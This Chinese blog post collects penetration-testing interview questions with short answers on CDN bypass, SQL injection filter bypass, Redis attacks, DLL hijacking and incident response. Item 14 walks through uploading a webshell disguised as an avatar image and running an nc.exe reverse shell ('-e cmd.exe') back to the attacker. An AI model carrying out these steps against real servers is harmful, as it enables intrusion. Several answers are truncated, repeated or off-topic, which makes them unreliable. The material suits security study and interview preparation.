渗透测试常用技巧和知识点

1.如何绕过CDN查找真实ip?
1.查询历史DNS记录
2.查询子域名
3.网络空间引擎搜索法
4.利用HTTP标头寻找真实原始IP
5.网站邮件头信息

2.phpinfo你会关注哪些信息
.一、绝对路径
二、支持的程序
三、GOPHER (​ Gopher是Internet信息查找系统)
四,真实ip
五,查看是否开启fastcgi和fastcgi的版本,可能导致解析漏洞、远程命令执行、任意文件读取等问题
六、泄漏缓存文件地址
七、敏感配置

  1. 有没有了解过权限维持
    构建计划任务
    注册自启动服务
    自启动注册表植入后门
    映像劫持
    失败命令
    logon scripts 后门
    创建隐藏账号
    https://blog.csdn.net/qq_44159028/article/details/124170549

4.输出到href的XSS如何防御(跨站脚本攻击)
1.a标签的href属性中一般放的是URL(链接),所以我们可以规定, 这里的输入必须以http或者https开头,否则不予以输入。
2.再对这里进行htmlspecialchars(,ENT_QUOTES)函数处理。
防御:
1.a标签的href属性中一般放的是URL(链接),所以我们可以规定, 这里的输入必须以http或者https开头,否则不予以输入。
2.再对这里进行htmlspecialchars(,ENT_QUOTES)函数处理。(可以将html源码转换成html的页面内容)
https://blog.csdn.net/qq_43814486/article/details/89855663

7.浏览器解析顺序和解码顺序
主要分为两个过程:
1、 浏览器接收到响应数据后,解析器先对HTML之类的文档进行解析,构建成DOM节点树,同时,CSS会被CSS解析器解析生成样式表。
2、 解析html标签过程中遇到

  1. 过滤逗号的SQL注入如何绕过
    1.union联合注入
    使用join代替逗号.
    2.盲注

9.过滤limit后的逗号如何绕过
对于limit可以使用offset来绕过
group_concat连起来

10.说一个你知道的python相关的漏洞(SSTI原理,利用过程,payload相关的东西)
一、 注入命令的执行
二、使用旧版本的 Python
三、临时文件的创建
四、断言语句的问题
五、导入路径问题

11.有哪些混淆绕过的方法?

12.内存马有没有了解过
内存马是指一种只在内存中运行,没有文件落地或者运行后能够删除自身的木马

  1. 冰蝎、哥斯拉这些工具有没有了解过?
    冰蝎是一款目前比较流行的Webshell管理工具
    哥斯拉是一款比较新的Webshell管理工具

14.头像上传的webshell是怎么上传的
1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。
2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上传图片名称的代码改成web.php,之后继续响应请求。
3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站URL后面(注意将?php覆盖)刷新网页。
4、然后输入相应密码进入控制服务器端,将本机的nc.exe(netcut)上载到其C盘根目录下。
5、而后在自己本机打开cmd命令窗口找到nc.exe所在的目录并运行
6、这时已经进入nc.exe,在Cmd line:后输入nc -vv -l -p 8080进行监听
7、在控制服务器端选择Execute Command窗口,输入’c:\nc.exe -vv [自身ip 端口] -e cmd.exe’启动nc(绑定服务器端主机的cmd.exe在本机的相应端口)

15.资产收集这块有没有什么经验介绍的?
计算机(或通讯)网络中使用的各种设备。主要包括主机、网络设备(路由器、交换机等)和安全设备(防火墙等)

  1. 聊一下sql注入
    SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息

17.一个系统的登录页,通常可能出现什么漏洞
1、注入点及万能密码登录
2、登录时,不安全的用户提示:比如提示用户名不存在或者密码验证码错误
3、查看登录页面源代码,看是否存在敏感信息泄露
4、不安全的验证码
5、在注册账号的时候,是否存在不安全的提示
6、不安全的密码,在注册账号的时候密码没有限制复杂度
7、任意无限注册账号
8、在暴力破解的时候不会限制ip,锁定用户
9、一个账号可以在多地登录,没有安全提示
10、账户登录之后,没有具备超时功能
11、OA,邮件,默认账号等相关系统,在不是自己注册的情况下,应该在登录之后强制要求更改密码
12、逻辑漏洞,任意更改密码
13、越权漏洞,纵向、横向越权
14、数据包含有风险信息泄露,比如COOKIE
15、不安全的数字传输,密码为明文,未使用https证书
16、任意文件下载

18.在浏览器中输入一个域名去访问时,浏览器做了什么?
1.输入域名回车,浏览器首先会从主机的Hosts文件中查看是否有域名和IP的映射关系。
2.如果Hosts文件没有,浏览器会查看自己的缓存,根据缓存文件的新旧来判断是否发送新的请求。
3.当上面两个方法都没有时,会通过DNS查询域名对应的IP地址。
4.获取到该域名所对应的IP地址之后,与IP地址建立TCP连接,浏览器确认连接后发送一个HTTP请求报文。
5.请求抵达运营商维护的CDN服务器,看看是否有该请求对应响应的静态页面。如果CDN没有,则先询问入口服务器,如果入口服务器有对应请求响应的静态页面,那么可以作为一个反向代理回复请求报文。
6.如果入口服务器也没有,则要深入去相关的服务器取得数据。服务器根据请求的内容,做数据处理,返回对应的页面和内容。

19.redis的漏洞
1Redis未授权访问
2.redis写入webshell
3.redis密钥登录ssh
4.利用计划任务反弹shell
5.远程主从复制RCE
6.本地Redis主从复制RCE反弹shell

20.怎么判断一个数据库是mysql还是oracle的?
1.mysql中组函数在select语句中可以随意使用,但在oracle中 如果查询语句中有组函数,那其他列名必须是组函数处理过的,或者是group by子句中的列 否则报错
2自动增长的数据类型处理:MYSQL有自动增长的数据类型,插入记录时不用操作此字段,会自动获得数据值。ORACLE没有自动增长的数据类型,需要建立一个自动增长的序列号,插入记录时要把序列号的下一个值赋于此字段

22.DLL 劫持原理
由于输入表中只包含 DLL 名而没有它的路径名,因此加载程序必须在磁盘上搜
索 DLL 文件。首先会尝试从当前程序所在的目录加载 DLL,如果没找到,则在
Windows 系统目录中查找,最后是在环境变量中列出的各个目录下查找。利用
这个特点,先伪造一个系统同名的 DLL,提供同样的输出表,每个输出函数转向
真正的系统 DLL。程序调用系统 DLL 时会先调用当前目录下伪造的 DLL,完成相关功能后,再跳到系统 DLL 同名函数里执行。这个过程用个形象的词来描述
就是系统 DLL 被劫持(hijack)了。
伪造的 dll 制作好后,放到程序当前目录下,这样当原程序调用原函数时就调用
了伪造的 dll 的同名函数,进入劫持 DLL 的代码,处理完毕后,再调用原 DLL
此函数。
如何防止 DLL 劫持
指定系统 DLL 的位置,改变加载系统 DLL 的顺序不是当前 目录,而是直接到系统目录下查找。

23.手工查找后门木马的小技巧
1.首先最需要注意的地方是系统的启动项
2.查看系统关键目录 system32 和系统安装目录 Windows 下的文件,xp 系统
3、观察网络连接是否存在异常,还有“运行”-“cmd”-“netstat-an”查看有没有可疑 或非正常程序的网络连接

24.SYN Flood 的基本原理
SYN Flood 是当前最流行的 DoS(拒绝服务攻击)与 DDoS(分布式拒绝服务 攻击)的方式之一,这是一种利用 TCP 协议缺陷,发送大量伪造的 TCP 连接请 求,从而使得被攻击方资源耗尽(CPU 满负荷或内存不足)的攻击方式

25.主机被入侵,你会如何处理这件事自查解决方案:
1、病毒木马排查。
1.1、使用 netstat 查看网络连接,分析是否有可疑发送行为,如有则停止。(
1.2、使用杀毒软件进行病毒查杀。
2、服务器漏洞排查并修复
2.1、查看服务器账号是否有异常,如有则停止删除掉。
2.2、查看服务器是否有异地登录情况,如有则修改密码为强密码(字每+数字+
特殊符号)大小写,10 位及以上。
2.3、查看 Jenkins、Tomcat、PhpMyadmin、WDCP、Weblogic 后台密码,提
高密码强度(字每+数字+特殊符号)大小写,10 位及以上。
2.4、查看 WEB 应用是否有漏洞,如 struts,ElasticSearch 等,如有则请升级。
2.5、查看 MySQL、SQLServer、FTP、WEB 管理后台等其它有设置密码的地
方,提高密码强度(字每+数字+特殊符号)大小写,10 位及以上。 2.6、查看 Redis 无密码可远程写入文件漏洞,检查/root/.ssh/下黑客创建的

26.为什么内网渗透要添加路由?
如果我已经拿到了一台内网服务器,需要使用MSF去访问内网资源,这时候就需要在msf中添加去往“内网网段”的路由。
MSF跳板实现过程:
需要获得一个msf的session会话;
获取内网地址网段;
在msf中添加”内网网段“的路由;

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值